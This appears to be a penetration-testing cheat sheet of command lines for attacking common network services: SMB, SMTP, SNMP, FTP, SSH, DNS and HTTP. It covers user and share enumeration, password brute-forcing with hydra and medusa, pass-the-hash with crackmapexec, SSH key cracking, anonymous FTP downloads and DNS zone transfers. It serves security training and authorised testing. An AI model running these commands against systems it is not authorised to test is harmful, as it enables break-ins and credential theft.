Hacking Common Services

A cheat sheet and resource for ethically hacking common services across diverse systems. Use it as your trusted guide in cybersecurity pursuits.

SMB

SMBMap

smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u victim -p password [with creds]

Smbclient

smbclient -L 10.10.10.10
smbclient -L //10.10.10.10/tmp

smbclient -U "" //10.10.10.10/anon
smbclient -U "Username" 10.10.10.10
smbclient -U "Username" 10.10.10.10/share-name

smbclient -L \\\\<target-ip>
smbclient \\\\<target-ip>\\<share-name>

smbclient -N //10.10.10.10/tmp --option='client min protocol=NT1' [legacy]

SMB Nmap Scripts

# list all smb scripts
ls -1 /usr/share/nmap/scripts/smb*

# Run with:
nmap -p 445 10.10.10.10 --script smb-os-discovery.nse [single]
nmap -p 139,445 10.10.10.10 --script smb-vuln-* [group]

Nbtscan

# scan a subnet for valid netbios names.
nbtscan -r 10.10.10.10/24

Doing NBT name scan for addresses from 192.168.50.0/24

IP address NetBIOS Name Server User MAC address
--------------------------------------------------------------------
192.168.50.124 SAMBA <server> SAMBA 00:00:00:00:00:00
192.168.50.134 SAMBAWEB <server> SAMBAWEB 00:00:00:00:00:00

RPCclient

rpcclient -U "" -N 10.10.10.10
rpcclient -U "Username" 10.10.10.10
$>
$>enum<tabtab>
    enumdomains    enumdomusers    enumdomgroups   enumdata    ...
    <All enumeration commands shown>

# Useful rpcclient commands:
srvinfo
enumalsgroups domain
enumalsgroups builtin
enumdomusers
lookupnames "Username"
queryuser <RID>

Enum4Linux

enum4linux 10.10.10.10

Brute Force

hydra -L users.txt -P passwords.txt 10.10.10.10 smb -V

Net View

# the /all switch also lists the administrative shares (names ending in a dollar sign).
net view \\dc01 /all
net view \\$IP /all

CrackMapExec (CME)

SMB Enumeration

SMB Enumeration
  crackmapexec smb <target-ip>

Username & Password Validation
  Single:
      crackmapexec smb <target-ip> -u 'username' -p 'password'
  Multi:
      crackmapexec smb <target-ip> -u users.txt -p passwords.txt
    
List Shares
  crackmapexec smb <target-ip> --shares

Spider Shares
  crackmapexec smb <target-ip> --spider <share-name> --pattern 'password'

Enumerate Sessions & Users
  crackmapexec smb <target-ip> --sessions
  crackmapexec smb <target-ip> --users
  
Pass-the-Hash
  crackmapexec smb <target-ip> -u 'username' -H 'hash_here'

SMTP

Netcat

# The VRFY command is used to verify the existence of a specific user or email address on the mail server.

nc -nv 192.168.50.8 25
(UNKNOWN) [192.168.50.8] 25 (smtp) open
220 mail ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root          [ user exists ]
VRFY idontexist
550 5.1.1 <idontexist>: Recipient address rejected: User unknown in local recipient table

# The EXPN command is used to request the server to provide information about a mailing list, which may contain valid email addresses or usernames.
EXPN mailinglist@example.com

Powershell

Test-NetConnection -Port 25 192.168.50.8

Banner Grabbing & Anon Access

Banner Grab
  nc <target-ip> 25

Anon Access
  HELO myname
  VRFY user@example.com
  
Send Email  
  MAIL FROM:<test@example.com>
  RCPT TO:<recipient@example.com>
  DATA
  Subject: Test email
  This is a test email.
  .

SNMP

use snmpwalk with 'public' community string 
  snmpwalk -c public -v1 -t 10 $IP

enumerate a specific MIB subtree
  snmpwalk -c public -v1 $IP 1.3.6.1.4.1.77.1.2.25

enumerate community strings (from a wordlist) across a list of hosts
  onesixtyone -c community -i ip_list.txt

onesixtyone

FTP

Banner Grabbing
  nc <target-ip> 21
  
Anonymous Logins
  ftp <target-ip>
  <enter>

  ftp <target-ip>
  >anonymous
  ><enter>
  
Brute Force
  medusa -h <target-ip> -U userlist.txt -P password-file -M ftp

Vulnerability Scan
  nmap -p 21 --script=ftp-* <target-ip>
  
Pull All Files
  wget -r ftp://Anonymous:pass@$IP

SSH

Banner Grab
  nc <target-ip> 22
  
Brute Force
  hydra -l username -P password_list.txt ssh://<target-ip>
  
Enumeration
  ssh-enum
  
SSH Login w/ Key:
  ssh -i id_rsa [username]@[target_IP_or_hostname]
  
SSH Tunnelling
  └─$ ssh -L 10000:127.0.0.1:10000 user@10.10.10.10
  
Crack SSH Keys
  ssh2john id_rsa > id_rsa_for_john.txt
  john --wordlist=/path/to/wordlist.txt id_rsa_for_john.txt

DNS

Query

# dig
ToxSec@Hack:~$ dig +short @10.10.10.10 A www.toxsec.com

# whois
ToxSec@Hack:~$ whois toxsec.com

# host
host www.toxsec.com
host -t mx www.toxsec.com

# nslookup
nslookup mail.toxsec.com

Zone Transfer

# dig
dig axfr @<TARGET-DNS-SERVER> <DOMAIN-NAME>
dig axfr @n1.toxsec.com toxsec.com
dig axfr @10.10.10.10 20.20.20.20

# nslookup
nslookup
set type=AXFR
server nameserver

domain
server ns1.toxsec.com
toxsec.com

Enumerate Subdomains

# host to check if a subdomain exists:
host fake.toxsec.com
Host fake.toxsec.com not found: 3(NXDOMAIN)

# used with a wordlist of hostnames (one per line; quoted so names with odd characters are passed intact):
while IFS= read -r name; do host "$name.megacorpone.com"; done < list.txt

# Fierce
fierce -dns <DOMAIN-NAME>

# Sublist3r
sublist3r -d <DOMAIN-NAME>

# amass
amass enum -d <domain name>

DNS Brute Forcing

# Gobuster
gobuster dns -u <DOMAIN-NAME> -w <WORDLIST>

# Nmap
nmap 10.10.10.10 --script dns-brute
nmap 10.10.10.10 --script dns-brute --script-args dns-brute.domain=toxsec.com
nmap 10.10.10.10 --script dns-brute --script-args dns-brute.hostlist=/home/dns/wordlist.txt

DNS Records

# MX
dig mx <DOMAIN-NAME>
dig +short @10.10.10.10 MX toxsec.com      [Note: No www]

# NS
dig ns <DOMAIN-NAME>

# TXT
dig txt <DOMAIN-NAME>

# CNAME
dig cname <SUBDOMAIN>.<DOMAIN-NAME>

# SRV
dig srv <DOMAIN-NAME>

DNSRecon

# Standard Scan
dnsrecon -d toxsec.com -t std

# Domain Scan
dnsrecon -d example.com

# Zone Transfer
dnsrecon -d example.com -t axfr

# Enumeration
dnsrecon -d example.com -t google

# Subdomains Brute Force
dnsrecon -d example.com -t brt -D /path/to/wordlist.txt

# Reverse DNS Lookup
dnsrecon -r 192.168.1.1-192.168.1.254

# SRV Record Enumeration
dnsrecon -d example.com -t srv

DNSEnum

# Deep information gathering + DNS ZT
dnsenum toxsec.com

HTTP

Brute-Force Login

# a PHP login page.
└─$ hydra -l <username> -P <password-list> <target> http-post-form "/login.php:<request>:<error-message>"

# Example for password guessing:
└─$ hydra -l R1ckRul3s -P rmwordlist 10.10.47.81 http-post-form "/login.php:username=R1ckRul3s&password=^PASS^&sub=Login:Invalid username or password."

Nmap HTTP Scripts

# Enumerate all http nmap scripts
ls -1 /usr/share/nmap/scripts/http*

# Use all http nmap scripts
nmap $IP --script=http-*
